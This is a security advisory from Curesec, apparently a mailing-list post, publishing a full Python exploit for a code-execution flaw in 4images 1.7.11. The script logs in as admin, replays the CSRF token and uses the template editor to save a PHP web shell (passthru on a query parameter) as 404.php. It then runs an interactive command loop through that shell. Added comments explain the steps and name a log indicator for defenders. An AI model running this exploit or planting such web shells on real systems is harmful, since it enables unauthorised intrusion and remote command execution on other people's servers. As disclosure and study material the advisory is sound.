
4images 1.7.11: Code Execution Exploit


From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Mon, 07 Dec 2015 18:13:00 +0100


#!/usr/local/bin/python
# Exploit for 4images 1.7.11 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

# Command-line interface: the base URL of the 4images install plus the admin
# credentials the script authenticates with (an admin account is a
# precondition, per the header comment -- this is post-authentication abuse
# of an admin feature, not an unauthenticated flaw).
parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

# Unpacked into module-level names read by the top-level flow further down.
url = args.url
username = args.username
password = args.password

# Admin endpoints; each is appended to the base URL before use.
loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"

# The "template" that is saved through the admin template editor: a .php file
# whose body passes the `x` query parameter to passthru(). The root cause the
# advisory demonstrates is that the editor evidently accepts a caller-chosen
# file name and arbitrary content, and the saved file is then reachable over
# HTTP under /templates/default/ (see the runShell call at the bottom).
shellFileName = "404.php"
shellContent = "<?php passthru($_GET['x']); ?>"

def login(requestSession, url, username, password):
    """Authenticate ``requestSession`` against the admin login form.

    Fetches the login page to read its ``__csrf`` hidden field, then posts
    the credentials together with that token so the session cookie jar
    carries the admin login for later requests.

    Returns True when the response body no longer contains the string
    ``loginpassword`` (i.e. the login form was not re-rendered), False
    otherwise. Raises AttributeError if the CSRF field is not found, because
    ``re.search`` returns None in that case.
    """
    csrfRequest = requestSession.get(url)
    # The admin form carries a CSRF token; the script reads it from the page
    # and replays it. CSRF protection therefore does not stop an actor who
    # already holds admin credentials -- it only defends against cross-site
    # requests from a victim's browser.
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": 
username, "loginpassword": password}
    loginResult = requestSession.post(url, data = postData).text
    # Success heuristic: the login form's password field is absent from the
    # response. Any page that happens to contain "loginpassword" would read
    # as a failed login.
    return "loginpassword" not in loginResult

def upload(requestSession, url, fileName, fileContent):
    """Save ``fileContent`` as template ``fileName`` via the admin template editor.

    Performs the same CSRF-token fetch as ``login()``, then posts a
    ``savetemplate`` action for ``template_folder`` "default". Nothing is
    returned and the HTTP response is not inspected; the local
    ``loginResult`` is assigned but never read.

    Defender note: the observable artefact of this abuse in request logs is
    a POST to admin/templates.php with ``action=savetemplate`` and a
    ``template_file_name`` carrying a ``.php`` suffix, issued from an
    authenticated admin session.
    """
    csrfRequest = requestSession.get(url)
    # Same token-replay pattern as in login(); raises AttributeError when the
    # token field is absent.
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, 
"template_folder": "default"}
    loginResult = requestSession.post(url, data = postData).text

def runShell(url):
    """Interactive loop: read a line, append it to ``url``, GET it, print the body.

    ``url`` is expected to already end in the ``?x=`` query prefix (see the
    caller at the bottom of the script). The loop ends as soon as the
    entered line contains the substring ``exit`` anywhere, not only when it
    equals "exit". ``raw_input`` is the Python 2 builtin, so this script is
    written for Python 2.
    """
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        # Plain requests.get, not the authenticated session: the saved file
        # is served as a public template and needs no admin cookie.
        print(requests.get(url + command).text)
        command = raw_input("$ ")

# One requests.Session so the admin login cookie set by login() is reused by
# upload().
requestSession = requests.session()

# Step 1: authenticate; stop with a message when the login form came back.
if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: Incorrect username or password")

# Step 2: write the PHP file through the template editor. upload() does not
# check the response, so a failed save is not detected here.
upload(requestSession, url + fileManagerPath, shellFileName, shellContent)

# Step 3: the saved template is fetched from /templates/default/ over plain
# HTTP, which is what makes the editor flaw a code-execution issue rather
# than a mere file write; hand control to the interactive loop.
runShell(url + "/templates/default/" + shellFileName + "?x=")


Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-Exploit-117.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany


